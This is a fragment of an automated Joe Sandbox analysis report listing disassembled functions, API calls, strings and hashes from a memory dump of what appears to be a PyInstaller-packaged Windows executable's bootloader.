                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                        • API String ID: 1662231829-930877121
                                                                                        • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                        • Instruction ID: 5dc50df7de2b082dede527c16f825fa99ee6ee66bed4b58758fc4901ef324e6a
                                                                                        • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                        • Instruction Fuzzy Hash: 59419351B2D64285FA50BF36F871AB9E251FF9C7B2FC050B2DA4E42695EE2CE5048360
                                                                                        Function 00007FF7CA7A02E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: f$f$p$p$f
                                                                                        • API String ID: 3215553584-1325933183
                                                                                        • Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                        • Instruction ID: 9729fdf35d9b8f656d733ac7177f68536e39b046f9d3c7d0175419ed0c409069
                                                                                        • Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                        • Instruction Fuzzy Hash: 6B129722E0C143A6FB607E16F0786B9F251FB84766FC45875E689466C4DF3CEC828B64
                                                                                        Function 00007FF7CA797FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                        • String ID: CreateProcessW$Failed to create child process!
                                                                                        • API String ID: 2895956056-699529898
                                                                                        • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                        • Instruction ID: f12b3981035044a2654949c3ea4a651c204c0cfc626424de18e302af76f872bd
                                                                                        • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                        • Instruction Fuzzy Hash: 7A414D32A0878291EA20AF25F4652AAB3A0FBDC371F900375EAAD437D5DF7CD4448B50
                                                                                        Function 00007FF7CA797C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF7CA793834), ref: 00007FF7CA797CE4
                                                                                        • CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF7CA793834), ref: 00007FF7CA797D2C
                                                                                          • Part of subcall function 00007FF7CA797E10: GetEnvironmentVariableW.KERNEL32(00007FF7CA79365F), ref: 00007FF7CA797E47
                                                                                          • Part of subcall function 00007FF7CA797E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7CA797E69
                                                                                          • Part of subcall function 00007FF7CA7A7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7A7561
                                                                                          • Part of subcall function 00007FF7CA7926C0: MessageBoxW.USER32 ref: 00007FF7CA792736
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                        • API String ID: 740614611-1339014028
                                                                                        • Opcode ID: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
                                                                                        • Instruction ID: 91cdc93960275bf2f8001bdb1c66751abf2e88145991c7ace678a285fe8fabe2
                                                                                        • Opcode Fuzzy Hash: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
                                                                                        • Instruction Fuzzy Hash: F141AF11A09A4290FA24BF77B9756F99251BF9DBA2FC010B2DD0D47796EE3CE9018360
                                                                                        Function 00007FF7CA79CFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7CA79D29A,?,?,?,00007FF7CA79CF8C,?,?,?,00007FF7CA79CB89), ref: 00007FF7CA79D06D
                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7CA79D29A,?,?,?,00007FF7CA79CF8C,?,?,?,00007FF7CA79CB89), ref: 00007FF7CA79D07B
                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7CA79D29A,?,?,?,00007FF7CA79CF8C,?,?,?,00007FF7CA79CB89), ref: 00007FF7CA79D0A5
                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7CA79D29A,?,?,?,00007FF7CA79CF8C,?,?,?,00007FF7CA79CB89), ref: 00007FF7CA79D113
                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7CA79D29A,?,?,?,00007FF7CA79CF8C,?,?,?,00007FF7CA79CB89), ref: 00007FF7CA79D11F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                        • String ID: api-ms-
                                                                                        • API String ID: 2559590344-2084034818
                                                                                        • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                        • Instruction ID: 0118371054b136b923ac20cc59fc5901ea0ad48df6ba7f1a83973a246ef4d33c
                                                                                        • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                        • Instruction Fuzzy Hash: 5931B461A1AB4285FE11AF3BB520A75A394BF4CB76F990576DD1D07391EF3CE4428320
                                                                                        Function 00007FF7CA797B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                        • String ID:
                                                                                        • API String ID: 995526605-0
                                                                                        • Opcode ID: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                                                        • Instruction ID: e8062758e099b96dd1fdf00f39dd3351d2cae3f5f081f0465971c74a053c32ca
                                                                                        • Opcode Fuzzy Hash: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                                                        • Instruction Fuzzy Hash: DD216422A0CB4641FB10AF76F460639E3A5FBC97B5F900275EA6D43AE4DF6CD4448710
                                                                                        Function 00007FF7CA7AA460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 2506987500-0
                                                                                        • Opcode ID: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                        • Instruction ID: 0314e74cc5f95f78e9c49c88b710fc0b5e1f18f0eb6b879f71166abd8444de39
                                                                                        • Opcode Fuzzy Hash: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                        • Instruction Fuzzy Hash: 9B219D20A0C64662FA65BF277665178E1527F4C7B2F9426B4E83E07AD6DE2CAC004720
                                                                                        Function 00007FF7CA7929E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorFormatLast
                                                                                        • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                        • API String ID: 3971115935-1149178304
                                                                                        • Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                        • Instruction ID: 4250e1d6aa25750368fcfd56bc4043e7a89557ad79938c11b45ca0487a98d378
                                                                                        • Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                        • Instruction Fuzzy Hash: 26214F72618B8192F720AF21F4606EAA364FB8C795F800136EE8D53A98DF3CD5468B50
                                                                                        Function 00007FF7CA7981F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF7CA7939F2), ref: 00007FF7CA79821D
                                                                                        • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF7CA7939F2), ref: 00007FF7CA79827A
                                                                                          • Part of subcall function 00007FF7CA7986B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7CA793FA4,00000000,00007FF7CA791925), ref: 00007FF7CA7986E9
                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7CA7939F2), ref: 00007FF7CA798305
                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7CA7939F2), ref: 00007FF7CA798364
                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7CA7939F2), ref: 00007FF7CA798375
                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7CA7939F2), ref: 00007FF7CA79838A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 3462794448-0
                                                                                        • Opcode ID: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                                                        • Instruction ID: b80aa7439ca25f78f7b8e0553ee0647e961ae5b716fc38f6ff84b748aaf1a4ee
                                                                                        • Opcode Fuzzy Hash: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                                                        • Instruction Fuzzy Hash: AE41A362A1968281FA30AF33B424ABEB398FB88BA1F844176DF5C57785DE3CD401C710
                                                                                        Function 00007FF7CA798400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF7CA797B50: GetCurrentProcess.KERNEL32 ref: 00007FF7CA797B70
                                                                                          • Part of subcall function 00007FF7CA797B50: OpenProcessToken.ADVAPI32 ref: 00007FF7CA797B83
                                                                                          • Part of subcall function 00007FF7CA797B50: GetTokenInformation.ADVAPI32 ref: 00007FF7CA797BA8
                                                                                          • Part of subcall function 00007FF7CA797B50: GetLastError.KERNEL32 ref: 00007FF7CA797BB2
                                                                                          • Part of subcall function 00007FF7CA797B50: GetTokenInformation.ADVAPI32 ref: 00007FF7CA797BF2
                                                                                          • Part of subcall function 00007FF7CA797B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7CA797C0E
                                                                                          • Part of subcall function 00007FF7CA797B50: CloseHandle.KERNEL32 ref: 00007FF7CA797C26
                                                                                        • LocalFree.KERNEL32(?,00007FF7CA793814), ref: 00007FF7CA79848C
                                                                                        • LocalFree.KERNEL32(?,00007FF7CA793814), ref: 00007FF7CA798495
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                        • API String ID: 6828938-1529539262
                                                                                        • Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                        • Instruction ID: 1d977b1d102933c60258047caae83c8af19b1fcc10cdecb65517ef8c3270a44a
                                                                                        • Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                        • Instruction Fuzzy Hash: C0215031A0874182F610BF32F5256E9A2A4FF9C7A2FD440B6EA4D43796DF3CD84487A0
                                                                                        Function 00007FF7CA792300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                        • String ID: Unhandled exception in script
                                                                                        • API String ID: 3081866767-2699770090
                                                                                        • Opcode ID: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
                                                                                        • Instruction ID: 212bd4a2b353b85c56b0cc94476a372b3865c2bf3c5935bd9096bb9bc884cbf4
                                                                                        • Opcode Fuzzy Hash: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
                                                                                        • Instruction Fuzzy Hash: B7316C72609A8289FB20AF62F8656F9A360FB8C7A5F800076EE4D47B55DF3CD5008710
                                                                                        Function 00007FF7CA7A52B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: verbose
                                                                                        • API String ID: 3215553584-579935070
                                                                                        • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                        • Instruction ID: 42c661bcbece017b442733abeb23d88a5d058ca9426d124f2484c1d4d4e6cfe0
                                                                                        • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                        • Instruction Fuzzy Hash: B491E432A08A4661F724AE26E46037DB396BB48B76FC86175DA4D463D5DF3DEC018321
                                                                                        Function 00007FF7CA79C968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 2395640692-1018135373
                                                                                        • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                        • Instruction ID: f59913bbb08c61f2ced89a18c217199cb1c56ce33f84925074157c3307ef255d
                                                                                        • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                        • Instruction Fuzzy Hash: CD519E32B196428EEF14EF37F424A79B391FB48BA9F904172DA4D47788DE78E8418710
                                                                                        Function 00007FF7CA79E1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallEncodePointerTranslator
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 3544855599-2084237596
                                                                                        • Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                        • Instruction ID: 12bc4066f47c5cf2f26f388afaf4c1314fd1017b39310e591eaec9de738e6420
                                                                                        • Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                        • Instruction Fuzzy Hash: ED619432908BC585E7209F36F4507AAB7A4FB897A5F444266EB9C03795DF7CD090CB10
                                                                                        Function 00007FF7CA7AC270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CA7AC25B), ref: 00007FF7CA7AC38C
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CA7AC25B), ref: 00007FF7CA7AC417
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
